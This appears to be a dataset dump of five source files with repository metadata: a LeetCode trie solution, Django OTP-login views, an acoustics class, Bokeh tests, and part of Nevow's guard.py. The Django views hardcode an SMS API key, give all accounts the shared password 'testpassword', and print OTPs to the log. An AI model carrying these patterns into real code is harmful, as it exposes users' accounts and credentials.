blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
32471ddbd0a025de389d955a990ab2f6f3e858c3 | 94f180b4b0b0a699d6948fd5e1216d16d6735edc | /source-code/Map Sum Pairs 677.py | 4e7990ac2f79efb70905565c8fdeeb02907fc31e | [
"MIT"
] | permissive | ttungl/Coding-Interview-Challenge | 7093b7f8da0c03abaf2f61340384cdc15c7a31e7 | d80c3e15468d50b42ee53fcc73e9326c6c816495 | refs/heads/master | 2021-09-15T05:25:27.192040 | 2018-05-26T19:02:33 | 2018-05-26T19:02:33 | 115,586,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | # 677. Map Sum Pairs
# ttungl@gmail.com
# Implement a MapSum class with insert, and sum methods.
# For the method insert, you'll be given a pair of (string, integer). The string represents the key and the integer represents the value. If the key already existed, then the original key-value pair will be overridden to the new one.
# For the method sum, you'll be given a string representing the prefix, and you need to return the sum of all the pairs' value whose key starts with the prefix.
# Example 1:
# Input: insert("apple", 3), Output: Null
# Input: sum("ap"), Output: 3
# Input: insert("app", 2), Output: Null
# Input: sum("ap"), Output: 5
# sol 1
# runtime: 38ms
class TrieNode(object):
    """One node of the prefix trie used by MapSum (solution 1).

    Holds child edges keyed by single character and the running sum of
    the values of every key whose path passes through this node.
    """
    def __init__(self, v=0):
        """
        :type v: int -- initial count carried by this node (default 0).
        """
        # A plain dict is the correct container here.  The original used
        # ``collections.defaultdict()`` with no factory -- which behaves
        # exactly like a dict (raises KeyError on missing keys) -- and the
        # snippet never imports ``collections``, so it raised NameError.
        self.children = {}
        self.count = v
class MapSum(object):
    """Prefix-sum map backed by a character trie (LeetCode 677, solution 1).

    insert(key, val) overrides any previous value stored under ``key``;
    sum(prefix) returns the sum of the values of all keys that start
    with ``prefix``.  Both operations are O(len(key)).
    """
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.root = TrieNode()
        # key -> value currently stored, so a re-insert can push only the
        # delta down the key's trie path.  A plain dict replaces the
        # original factory-less ``collections.defaultdict()`` (identical
        # semantics, and the snippet never imported ``collections``).
        self.keys = {}
    def insert(self, key, val):
        """
        :type key: str
        :type val: int
        :rtype: void
        """
        node = self.root
        # Difference against the previous value (0 for a new key); adding
        # it along the path keeps every prefix count correct on override.
        diff = val - self.keys.get(key, 0)
        self.keys[key] = val
        for c in key:
            if c not in node.children:
                node.children[c] = TrieNode()
            node = node.children[c]
            node.count += diff
    def sum(self, prefix):
        """
        :type prefix: str
        :rtype: int
        """
        node = self.root
        # Walk the trie along the prefix; a missing edge means no stored
        # key has this prefix.
        for c in prefix:
            if c not in node.children:
                return 0
            node = node.children[c]
        return node.count
# sol 2:
# runtime: 31ms
class MapSum(object):
    """Prefix-sum map backed by a flat dict (LeetCode 677, solution 2).

    insert() is O(1); sum() scans every stored key, so it costs
    O(total stored key length) per call -- fine for small maps.
    """
    def __init__(self):
        """
        Initialize your data structure here.
        """
        # key -> most recently inserted value (insert overrides).
        self.x = {}
    def insert(self, key, val):
        """
        :type key: str
        :type val: int
        :rtype: void
        """
        self.x[key] = val
    def sum(self, prefix):
        """
        :type prefix: str
        :rtype: int
        """
        # str.startswith is clearer than the original slice-compare
        # (``i[:len(prefix)] == prefix``) and avoids building a new
        # string per key; sum() replaces the manual accumulator loop.
        return sum(v for k, v in self.x.items() if k.startswith(prefix))
# Your MapSum object will be instantiated and called as such:
# obj = MapSum()
# obj.insert(key,val)
# param_2 = obj.sum(prefix)
| [
"noreply@github.com"
] | ttungl.noreply@github.com |
1d110680a248ff7b57501497a49da59bfba00b86 | a9fd2e227f7f529fbec50caa82d5962019c5f3ee | /account/views.py | a0e85245023aad2768d6dcdd5e24d8ad8acb1832 | [] | no_license | jsparmani/TeekaSchedule | 1477f3b38aec484c77276fc0f731c85c12fa34d2 | 76c01dd742f692cfd50c299807413b99a20c5535 | refs/heads/master | 2020-07-15T06:36:11.500851 | 2019-09-01T05:46:57 | 2019-09-01T05:46:57 | 205,501,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,949 | py | from django.shortcuts import render, redirect
from . import forms
import random
from . import models
from django.contrib.auth import authenticate
from django.contrib.auth import login as auth_login
from django.contrib.auth.models import User
from datetime import datetime
from location import models as loc_models
import requests
# Create your views here.
# NOTE(review): hardcoded third-party SMS-gateway API key committed to source
# control -- move it to settings/environment configuration and rotate the key.
api_key = '292a8d1f-295e-11e9-9ee8-0200cd936042'
def get_parent_username(request):
    """Step 1 of parent login: collect a username (phone number), create an
    OTP record for it, and redirect to the OTP-entry view.

    GET renders the username form; POST validates it and issues the OTP.
    Failures redirect to the generic 'fault' view.
    """
    if request.method == 'POST':
        form = forms.ParentUsernameForm(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            # NOTE(review): random.randint is not cryptographically secure;
            # consider the ``secrets`` module for OTP generation.
            otp = random.randint(111111, 999999)
            try:
                otp_user = models.OTP.objects.create(
                    username=username,
                    otp=otp,
                    created_at=datetime.now()
                )
            except Exception:
                # Narrowed from a bare ``except:`` so system-exiting
                # exceptions (KeyboardInterrupt/SystemExit) still propagate.
                return redirect('fault', fault="Server Error!")
            # NOTE(review): printing the OTP leaks the secret to server
            # logs; drop this once the SMS gateway below is re-enabled.
            print(otp)
            # link = f'https://2factor.in/API/R1/?module=TRANS_SMS&apikey={api_key}&to={username}&from=ECIWEB&templatename=OTP&var1=Sir&var2={otp}'
            # requests.get(link)
            return redirect('account:get_parent_otp', pk=otp_user.pk)
        else:
            return redirect('fault', fault="Server Error!")
    else:
        form = forms.ParentUsernameForm()
    return render(request, 'account/get_parent_username.html', {'form': form})
def get_parent_otp(request, pk):
    """Step 2 of parent login: verify the OTP stored under record ``pk`` and
    log the user in, creating the Django user + ParentUser on first login.

    GET renders the OTP form; POST compares the submitted OTP against the
    stored one.  Failures redirect to the generic 'fault' view.
    """
    try:
        otp_user = models.OTP.objects.get(pk__exact=pk)
    except Exception:
        # Previously an unknown pk raised OTP.DoesNotExist uncaught and
        # produced a 500; fail soft like the sibling views instead.
        return redirect('fault', fault="Server Error!")
    if request.method == 'POST':
        form = forms.ParentOTPForm(request.POST)
        if form.is_valid():
            otp = form.cleaned_data['otp']
            if otp == otp_user.otp:
                # NOTE(review): every parent account shares the fixed
                # password 'testpassword', so authentication is effectively
                # OTP-only.  Consider unusable passwords plus a custom auth
                # backend instead of a known shared secret.
                user = authenticate(request, username=otp_user.username,
                                    password='testpassword')
                if user:
                    auth_login(request, user)
                    return redirect('home')
                else:
                    # First login: create the account, then authenticate
                    # again so the session backend is attached to the user.
                    user = User.objects.create_user(
                        username=otp_user.username,
                        password='testpassword'
                    )
                    user.save()
                    models.ParentUser.objects.create(
                        user=user
                    )
                    user = authenticate(request, username=otp_user.username,
                                        password='testpassword')
                    auth_login(request, user)
                    return redirect('home')
            else:
                return redirect('fault', fault="Invalid Credentials!")
        else:
            return redirect('fault', fault="Server Error!")
    else:
        form = forms.ParentOTPForm()
    return render(request, 'account/get_parent_otp.html', {'form': form})
def get_parent_details(request):
    """Collect profile details (names, birthdays, locality) for the
    currently logged-in ParentUser and save them.

    GET renders the details form; POST validates and persists it, then
    redirects home.  Failures redirect to the generic 'fault' view.
    """
    if request.method == 'POST':
        form = forms.ParentDetailsForm(request.POST)
        if form.is_valid():
            address = form.cleaned_data['address']
            f_name = form.cleaned_data['f_name']
            m_name = form.cleaned_data['m_name']
            f_dob = form.cleaned_data['f_dob']
            m_dob = form.cleaned_data['m_dob']
            print(request.user.username)
            try:
                user = models.ParentUser.objects.get(
                    user__username__exact=request.user.username)
            except Exception:
                # Narrowed from a bare ``except:``; an anonymous user or a
                # missing ParentUser row lands here.
                return redirect('fault', fault="Server Error")
            user.f_name = f_name
            user.m_name = m_name
            user.f_dob = f_dob
            user.m_dob = m_dob
            # NOTE(review): Locality lookup is uncaught -- an unknown
            # locality name will raise DoesNotExist here; confirm the form
            # restricts choices to existing localities.
            user.address = loc_models.Locality.objects.get(name__exact=address)
            user.save()
            return redirect('home')
        else:
            return redirect('fault', fault="Server Error!")
    else:
        form = forms.ParentDetailsForm()
    return render(request, 'account/get_parent_details.html', {'form': form})
| [
"jsparmani@gmail.com"
] | jsparmani@gmail.com |
3f4cb50a830c6cc835b54c6700548fc256c8fb0b | 5ef46abb67b07646537b4fc1d5880fdc91e412b2 | /Sea/adapter/couplings/Coupling2DCavities3D.py | 01b99fed556d8c6968ba029fb6095735b7343e64 | [] | no_license | python-acoustics/Sea | 3f13f8d0d39200a4b35f9edfe8e3a7b2783c6966 | e30b6dc59d8ab02cd41924f7b6c14d0d1e77e19e | refs/heads/master | 2016-09-05T16:59:01.602835 | 2013-04-16T15:29:54 | 2013-04-16T15:29:54 | 7,466,520 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,060 | py | import numpy as np
import Sea
from Coupling import Coupling
class Coupling2DCavities2D(Coupling):
    """
    Coupling for cavity2D to cavity transmission.
    """
    # NOTE(review): the file path says Coupling2DCavities3D but the class is
    # named ...2D2D -- confirm which pairing this coupling is meant to model.
    @property
    def impedance_from(self):
        """
        Choses the right impedance of subsystem_from.
        Applies boundary conditions correction as well.
        """
        return self.subsystem_from.impedance
    @property
    def impedance_to(self):
        """
        Choses the right impedance of subsystem_to.
        Applies boundary conditions correction as well.
        """
        return self.subsystem_to.impedance
    @property
    def tau(self):
        """
        Transmission coefficient.

        Placeholder: currently returns an all-zeros array of one value per
        frequency band, so clf below is also all zeros.
        """
        return np.zeros(self.frequency.amount)
    @property
    def clf(self):
        """
        Coupling loss factor for transmission from a 2D cavity to a cavity.
        .. math:: \\eta_{12} = \\frac{ \\tau_{12}}{4 \\pi}
        See BAC, equation 3.14
        """
        return self.tau / (4.0 * np.pi) | [
"fridh@fridh.nl"
] | fridh@fridh.nl |
829b5c5c784978dd392e43c8f6430520201503fe | 2a3743ced45bd79826dcdc55f304da049f627f1b | /venv/lib/python3.7/site-packages/bokeh/util/tests/test_dependencies.py | f27c2fd625febb1ffaad405c649ce2d9ae7294d0 | [
"MIT"
] | permissive | Dimasik007/Deribit_funding_rate_indicator | 12cc8cd7c0be564d6e34d9eae91940c62492ae2a | 3251602ae5249069489834f9afb57b11ff37750e | refs/heads/master | 2023-05-26T10:14:20.395939 | 2019-08-03T11:35:51 | 2019-08-03T11:35:51 | 198,705,946 | 5 | 3 | MIT | 2023-05-22T22:29:24 | 2019-07-24T20:32:19 | Python | UTF-8 | Python | false | false | 2,956 | py | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
# Module under test
import bokeh.util.dependencies as dep
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_detect_phantomjs(object):
    """Tests for dep.detect_phantomjs (binary discovery + version check)."""

    def test_detect_phantomjs_success(self):
        assert dep.detect_phantomjs() is not None

    def test_detect_phantomjs_bad_path(self, monkeypatch):
        # Pointing the env override at a nonexistent binary must fail loudly.
        monkeypatch.setenv("BOKEH_PHANTOMJS_PATH", "bad_path")
        with pytest.raises(RuntimeError):
            dep.detect_phantomjs()

    def test_detect_phantomjs_bad_version(self):
        with pytest.raises(RuntimeError) as e:
            dep.detect_phantomjs('10.1')
        # Assert on the exception value itself: str() of the ExceptionInfo
        # wrapper includes traceback location text and is not stable across
        # pytest versions, so the original str(e).endswith(...) was fragile.
        assert str(e.value).endswith("PhantomJS version to old. Version>=10.1 required, installed: 2.1.1")

    def test_detect_phantomjs_default_required_version(self):
        assert dep.detect_phantomjs.__defaults__ == ('2.1',)
class Test_import_optional(object):
    """Tests for dep.import_optional: returns the module or None."""

    def test_success(self):
        module = dep.import_optional('sys')
        assert module is not None

    def test_fail(self):
        # A module that cannot exist must yield None, never raise.
        module = dep.import_optional('bleepbloop')
        assert module is None
class Test_import_required(object):
    """Tests for dep.import_required: returns the module or raises."""

    def test_success(self):
        module = dep.import_required('sys', 'yep')
        assert module is not None

    def test_fail(self):
        # The caller-supplied message must surface in the RuntimeError.
        with pytest.raises(RuntimeError) as excinfo:
            dep.import_required('bleepbloop', 'nope')
        assert 'nope' in str(excinfo.value)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| [
"dmitriy00vn@gmail.com"
] | dmitriy00vn@gmail.com |
9097821fe104f0d2f6befb909014004251bafa8e | 1524720d6480ad0a51b6fd8ff709587455bf4c5d | /tums/trunk/release/lib/nevow/guard.py | 818f44ae12232b6d0892ae314cb15ec6bcb8c75c | [] | no_license | calston/tums | 2bd6d3cac5232d2ccb7e9becfc649e302a310eab | b93e3e957ff1da5b020075574942913c8822d12a | refs/heads/master | 2020-07-12T03:46:43.639800 | 2018-05-12T10:54:54 | 2018-05-12T10:54:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,278 | py | # -*- test-case-name: nevow.test.test_guard -*-
# Copyright (c) 2004-2008 Divmod.
# See LICENSE for details.
"""
Resource protection for Nevow. If you wish to use twisted.cred to protect your
Nevow application, you are probably most interested in
L{SessionWrapper}.
"""
__metaclass__ = type
import random
import time
import md5
import StringIO
from zope.interface import implements
# Twisted Imports
from twisted.python import log, components
from twisted.internet import defer
from twisted.cred.error import UnauthorizedLogin
from twisted.cred.credentials import UsernamePassword, Anonymous
try:
from twisted.web import http
except ImportError:
from twisted.protocols import http
# Nevow imports
from nevow import inevow, url, stan
def _sessionCookie():
    """Generate a random session identifier.

    Returns the md5 hex digest of "<random float>_<current time>".
    (Python 2 ``md5`` module; not a cryptographic guarantee.)
    """
    seed = "%s_%s" % (str(random.random()), str(time.time()))
    return md5.new(seed).hexdigest()
class GuardSession(components.Componentized):
    """A user's session with a system.
    This utility class contains no functionality, but is used to
    represent a session.
    """
    implements(inevow.ISession, inevow.IGuardSession)
    def __init__(self, guard, uid):
        """Initialize a session with a unique ID for that session.
        """
        components.Componentized.__init__(self)
        # The SessionWrapper that owns this session (holds guard.sessions).
        self.guard = guard
        self.uid = uid
        # 0-arg callables invoked once each when the session expires.
        self.expireCallbacks = []
        # Pending IDelayedCall handle for the next expiry check, if any.
        self.checkExpiredID = None
        self.setLifetime(60)
        # Maps cred Portal -> (resource, logout callable) for each portal
        # this session has logged in to.
        self.portals = {}
        self.touch()
    # New Guard Interfaces
    def getLoggedInRoot(self):
        """Get the most-recently-logged-in avatar.
        """
        # XXX TODO: need to actually sort avatars by login order!
        # NOTE: indexing dict.values() is Python 2 only (it returns a list).
        if len(self.portals) != 1:
            raise RuntimeError("Ambiguous request for current avatar.")
        return self.portals.values()[0][0]
    def resourceForPortal(self, port):
        # Returns (resource, logout) for the portal, or None if not logged in.
        return self.portals.get(port)
    def setDefaultResource(self, rsrc, logout):
        """
        Change the root-resource available to the user who has already
        authenticated anonymously.  This only works in applications that DO NOT
        use the multiple-simultaneous-portals feature.  If you do not know what
        this means, you may safely ignore it.
        """
        if len(self.portals) != 1:
            raise RuntimeError("Ambiguous request for current avatar.")
        self.setResourceForPortal(
            rsrc,
            self.portals.keys()[0],
            logout)
    def setResourceForPortal(self, rsrc, port, logout):
        """Change the root-resource available to a user authenticating against a given
        portal.
        If a user was already logged in to this session from that portal, first
        log them out.
        @param rsrc: an L{IResource} implementor.
        @param port: a cred Portal instance.
        @param logout: a 0-arg callable to be invoked upon logout.
        """
        self.portalLogout(port)
        self.portals[port] = rsrc, logout
        return rsrc
    def portalLogout(self, port):
        """
        If we have previously acccepted a login for this portal, call its
        logout method and de-associate that portal from this session, catching
        any errors from the logout method.
        Otherwise: do nothing.
        @param port: a cred Portal.
        """
        p = self.portals.get(port)
        if p:
            log.msg('Logout of portal %r' % port)
            r, l = p
            # Logout callbacks must not break session teardown; log and go on.
            try:
                l()
            except:
                log.err()
            del self.portals[port]
    # timeouts and expiration
    def setLifetime(self, lifetime):
        """Set the approximate lifetime of this session, in seconds.
        This is highly imprecise, but it allows you to set some general
        parameters about when this session will expire.  A callback will be
        scheduled each 'lifetime' seconds, and if I have not been 'touch()'ed
        in half a lifetime, I will be immediately expired.
        """
        self.lifetime = lifetime
    def notifyOnExpire(self, callback):
        """Call this callback when the session expires or logs out.
        """
        self.expireCallbacks.append(callback)
    def expire(self):
        """Expire/logout of the session.
        """
        log.msg("expired session %s" % str(self.uid))
        # Remove ourselves from the wrapper's live-session table.
        del self.guard.sessions[self.uid]
        # Logout of all portals
        for portal in self.portals.keys():
            self.portalLogout(portal)
        # Fire expiry callbacks; a failing callback must not stop the rest.
        for c in self.expireCallbacks:
            try:
                c()
            except:
                log.err()
        self.expireCallbacks = []
        # Cancel any still-pending expiry check.
        if self.checkExpiredID:
            self.checkExpiredID.cancel()
            self.checkExpiredID = None
    def touch(self):
        # Record activity; checkExpired() measures idleness from this stamp.
        self.lastModified = time.time()
    def checkExpired(self):
        # Import reactor here to avoid installing default at startup
        from twisted.internet import reactor
        self.checkExpiredID = None
        # If I haven't been touched in half a lifetime:
        if time.time() - self.lastModified > self.lifetime / 2:
            # NOTE: dict.has_key is Python 2 only.
            if self.guard.sessions.has_key(self.uid):
                self.expire()
            else:
                log.msg("no session to expire: %s" % str(self.uid))
        else:
            # Still active; reschedule the next check one lifetime from now.
            log.msg("session given the will to live for %s more seconds" % self.lifetime)
            self.checkExpiredID = reactor.callLater(self.lifetime,
                                                    self.checkExpired)
    def __getstate__(self):
        # Drop the unpicklable IDelayedCall handle when serializing.
        d = self.__dict__.copy()
        if d.has_key('checkExpiredID'):
            del d['checkExpiredID']
        return d
    def __setstate__(self, d):
        # On unpickle, treat the session as freshly active and restart the
        # expiry timer that __getstate__ dropped.
        self.__dict__.update(d)
        self.touch()
        self.checkExpired()
def urlToChild(ctx, *extraSegments, **queryArgs):
    """Build a redirect URL for the current request.

    The URL is the request's own URL extended with each of extraSegments
    as a child path segment; each keyword argument becomes (or replaces)
    a query parameter.  For POST requests the existing query string is
    cleared first, so the result carries only the parameters given here.
    """
    target = url.URL.fromContext(ctx)
    for seg in extraSegments:
        target = target.child(stan.xml(seg))
    if inevow.IRequest(ctx).method == 'POST':
        target = target.clear()
    for name, value in queryArgs.items():
        target = target.replace(name, value)
    return target
# Special URL path segments recognized by SessionWrapper.locateChild.
SESSION_KEY = '__session_key__'  # prefix carrying the session id in the URL
LOGIN_AVATAR = '__login__'  # segment that triggers a portal login
LOGOUT_AVATAR = '__logout__'  # segment that triggers a portal logout
def nomind(*args):
    """Default mind factory: ignore all arguments and supply no mind."""
    return None
class Forbidden(object):
    """Resource that answers every request with HTTP 403 Forbidden."""
    implements(inevow.IResource)

    def locateChild(self, ctx, segments):
        # Every child path resolves back to this same forbidden resource.
        return self

    def renderHTTP(self, ctx):
        inevow.IRequest(ctx).setResponseCode(http.FORBIDDEN)
        return ("<html><head><title>Forbidden</title></head>"
                "<body><h1>Forbidden</h1>Request was forbidden.</body></html>")
class SessionWrapper:
    """
    SessionWrapper
    The following class attributes can be modified on an instance
    of the class.
    @ivar secureCookies: Whether to use secure (TLS only) cookies or not.
        True (default): make cookies secure when session is initiated
            in a secure (TLS) connection.
        False: cookies do not get the secure attribute.
    @ivar: persistentCookies: Whether to use persistent (saved to disk) cookies or not.
        True: make cookies persistent, so they are valid for the
            length of the sessionLifetime even if the browser window
            is closed.
        False (default): cookies do not get saved to disk, and thus last
            only as long as the session does.  If the browser is
            closed before the session timeout, both the session
            and the cookie go away.
    """
    implements(inevow.IResource)
    # Seconds of (approximate) session lifetime; see GuardSession.setLifetime.
    sessionLifetime = 3600
    # Factory producing session objects; overridable for customization.
    sessionFactory = GuardSession
    # The interface to cred for when logging into the portal
    credInterface = inevow.IResource
    useCookies = True
    secureCookies = True
    persistentCookies = False
    def __init__(self, portal, cookieKey=None, mindFactory=None, credInterface=None, useCookies=None):
        self.portal = portal
        if cookieKey is None:
            cookieKey = "woven_session_" + _sessionCookie()
        self.cookieKey = cookieKey
        # Maps session id (cookie value or HTTP-auth key) -> GuardSession.
        self.sessions = {}
        if mindFactory is None:
            mindFactory = nomind
        self.mindFactory = mindFactory
        if credInterface is not None:
            self.credInterface = credInterface
        if useCookies is not None:
            self.useCookies = useCookies
        # Backwards compatibility; remove asap
        self.resource = self
    def renderHTTP(self, ctx):
        request = inevow.IRequest(ctx)
        # Resolve the session/login state with no remaining path segments,
        # then render whatever resource that resolution yields.
        d = defer.maybeDeferred(self._delegate, ctx, [])
        # NOTE: tuple-unpacking parameters are Python 2 only syntax.
        def _cb((resource, segments), ctx):
            assert not segments
            res = inevow.IResource(resource)
            return res.renderHTTP(ctx)
        d.addCallback(_cb, ctx)
        return d
    def locateChild(self, ctx, segments):
        request = inevow.IRequest(ctx)
        path = segments[0]
        if self.useCookies:
            cookie = request.getCookie(self.cookieKey)
        else:
            cookie = ''
        if path.startswith(SESSION_KEY):
            # First segment embeds the session id (cookie-negotiation step).
            key = path[len(SESSION_KEY):]
            if key not in self.sessions:
                # Unknown/expired session id: restart session negotiation.
                return urlToChild(ctx, *segments[1:], **{'__start_session__':1}), ()
            self.sessions[key].setLifetime(self.sessionLifetime)
            if cookie == key:
                # /sessionized-url/${SESSION_KEY}aef9c34aecc3d9148/foo
                #                  ^
                #                  we are this getChild
                # with a matching cookie
                self.sessions[key].sessionJustStarted = True
                return urlToChild(ctx, *segments[1:]), ()
            else:
                # We attempted to negotiate the session but failed (the user
                # probably has cookies disabled): now we're going to return the
                # resource we contain.  In general the getChild shouldn't stop
                # there.
                # /sessionized-url/${SESSION_KEY}aef9c34aecc3d9148/foo
                #                  ^ we are this getChild
                # without a cookie (or with a mismatched cookie)
                return self.checkLogin(ctx, self.sessions[key],
                                       segments[1:],
                                       sessionURL=segments[0])
        else:
            # /sessionized-url/foo
            #                  ^ we are this getChild
            # with or without a session
            return self._delegate(ctx, segments)
    def _delegate(self, ctx, segments):
        """Identify the session by looking at cookies and HTTP auth headers, use that
        session key to identify the wrapped resource, then return a deferred
        which fires a 2-tuple of (resource, segments) to the top-level
        redirection code code which will delegate IResource's renderHTTP or
        locateChild methods to it
        """
        request = inevow.IRequest(ctx)
        cookie = request.getCookie(self.cookieKey)
        # support HTTP auth, no redirections
        userpass = request.getUser(), request.getPassword()
        httpAuthSessionKey = 'HTTP AUTH: %s:%s' % userpass
        for sessionKey in cookie, httpAuthSessionKey:
            if sessionKey in self.sessions:
                session = self.sessions[sessionKey]
                return self.checkLogin(ctx, session, segments)
        # without a session
        if userpass != ('',''):
            # the user is trying to log in with HTTP auth, but they don't have
            # a session.  So, make them one.
            sz = self.sessions[httpAuthSessionKey] = self.sessionFactory(self, httpAuthSessionKey)
            # kick off the expiry timer.
            sz.checkExpired()
            return self.checkLogin(ctx, sz, segments, None, UsernamePassword(*userpass))
        # no, really, without a session
        ## Redirect to the URL with the session key in it, plus the segments of the url
        rd = self.createSession(ctx, segments)
        return rd, ()
    def createSession(self, ctx, segments):
        """
        Create a new session for this request, and redirect back to the path
        given by segments.
        """
        request = inevow.IRequest(ctx)
        newCookie = _sessionCookie()
        if self.useCookies:
            if self.secureCookies and request.isSecure():
                secure = True
            else:
                secure = False
            if self.persistentCookies and self.sessionLifetime:
                expires = http.datetimeToString(time.time() + self.sessionLifetime)
            else:
                expires = None
            request.addCookie(self.cookieKey, newCookie,
                              path="/%s" % '/'.join(request.prepath),
                              secure=secure, expires=expires,
                              domain=self.cookieDomainForRequest(request))
        sz = self.sessions[newCookie] = self.sessionFactory(self, newCookie)
        # Stash the request's parameters on the session so checkLogin can
        # replay them onto the request after the redirect round-trip.
        sz.args = request.args
        sz.fields = request.fields
        sz.method = request.method
        sz.received_headers = request.received_headers
        sz.checkExpired()
        return urlToChild(ctx, SESSION_KEY+newCookie, *segments)
    def checkLogin(self, ctx, session, segments, sessionURL=None, httpAuthCredentials=None):
        """
        Associate the given request with the given session and:
            - log the user in to our portal, if they are accessing a login URL
            - log the user out from our portal (calling their logout callback),
              if they are logged in and accessing a logout URL
            - Move the request parameters saved on the session, if there are
              any, onto the request if a session just started or a login
              just succeeded.
        @return:
            - if the user is already logged in: a 2-tuple of requestObject,
              C{segments} (i.e. the segments parameter)
            - if the user is not logged in and not logging in, call login() to
              initialize an anonymous session, and return a 2-tuple of
              (rootResource, segments-parameter) from that anonymous session.
              This counts as logging in for the purpose of future calls to
              checkLogin.
            - if the user is accessing a login URL: a 2-tuple of the logged in
              resource object root and the remainder of the segments (i.e. the
              URL minus __login__) to be passed to that resource.
        """
        request = inevow.IRequest(ctx)
        session.touch()
        request.session = session
        root = url.URL.fromContext(request)
        if sessionURL is not None:
            root = root.child(sessionURL)
        request.rememberRootURL(str(root))
        # Replay stashed request parameters exactly once, right after a
        # session start or a successful login.
        spoof = False
        if getattr(session, 'sessionJustStarted', False):
            del session.sessionJustStarted
            spoof = True
        if getattr(session, 'justLoggedIn', False):
            del session.justLoggedIn
            spoof = True
        if spoof and hasattr(session, 'args'):
            request.args = session.args
            request.fields = session.fields
            request.content = StringIO.StringIO()
            request.content.close()
            request.method = session.method
            request.received_headers = session.received_headers
            del session.args, session.fields, session.method, session.received_headers
        if segments and segments[0] in (LOGIN_AVATAR, LOGOUT_AVATAR):
            authCommand = segments[0]
        else:
            authCommand = None
        if httpAuthCredentials:
            # This is the FIRST TIME we have hit an HTTP auth session with our
            # credentials.  We are going to perform login.
            assert not authCommand, (
                "HTTP auth support isn't that robust. "
                "Come up with something to do that makes sense here.")
            return self.login(request, session, httpAuthCredentials, segments).addErrback(
                self.authRequiredError, session
                )
        if authCommand == LOGIN_AVATAR:
            subSegments = segments[1:]
            def unmangleURL((res,segs)):
                # Tell the session that we just logged in so that it will
                # remember form values for us.
                session.justLoggedIn = True
                # Then, generate a redirect back to where we're supposed to be
                # by looking at the root of the site and calculating the path
                # down from there using the segments we were passed.
                u = url.URL.fromString(request.getRootURL())
                for seg in subSegments:
                    u = u.child(seg)
                return u, ()
            return self.login(request, session, self.getCredentials(request), subSegments).addCallback(
                unmangleURL).addErrback(
                self.incorrectLoginError, ctx, subSegments, "Incorrect login."
                )
        elif authCommand == LOGOUT_AVATAR:
            self.explicitLogout(session)
            return urlToChild(ctx, *segments[1:]), ()
        else:
            r = session.resourceForPortal(self.portal)
            if r:
                ## Delegate our getChild to the resource our portal says is the right one.
                return r[0], segments
            else:
                # XXX I don't think that the errback here will work at all,
                # because the redirect loop would be infinite.  Perhaps this
                # should be closer to the HTTP auth path?
                return self.login(request, session, Anonymous(), segments).addErrback(
                    self.incorrectLoginError, ctx, segments, 'Anonymous access not allowed.')
    def explicitLogout(self, session):
        """Hook to be overridden if you care about user-requested logout.
        Note: there is no return value from this method; it is purely a way to
        provide customized behavior that distinguishes between session-expiry
        logout, which is what 99% of code cares about, and explicit user
        logout, which you may need to be notified of if (for example) your
        application sets other HTTP cookies which refer to server-side state,
        and you want to expire that state in a manual logout but not with an
        automated logout.  (c.f. Quotient's persistent sessions.)
        If you want the user to see a customized logout page, just generate a
        logout link that looks like
            http://your-site.example.com/__logout__/my/custom/logout/stuff
        and the user will see
            http://your-site.example.com/my/custom/logout/stuff
        as their first URL after becoming anonymous again.
        """
        session.portalLogout(self.portal)
    def getCredentials(self, request):
        """Extract username/password form fields into cred credentials."""
        username = request.args.get('username', [''])[0]
        password = request.args.get('password', [''])[0]
        return UsernamePassword(username, password)
    def login(self, request, session, credentials, segments):
        """
        - Calls login() on our portal.
        - creates a mind from my mindFactory, with the request and credentials
        - Associates the mind with the given session.
        - Associates the resource returned from my portal's login() with my
          portal in the given session.
        @return: a Deferred which fires a 2-tuple of the resource returned from
        my portal's login() and the passed list of segments upon successful
        login.
        """
        mind = self.mindFactory(request, credentials)
        session.mind = mind
        return self.portal.login(credentials, mind, self.credInterface).addCallback(
            self._cbLoginSuccess, session, segments
        )
    def _cbLoginSuccess(self, (iface, res, logout), session, segments):
        # Portal.login fired (interface, avatar resource, logout); record the
        # avatar on the session and pass it down the callback chain.
        session.setResourceForPortal(res, self.portal, logout)
        return res, segments
    def incorrectLoginError(self, error, ctx, segments, loginFailure):
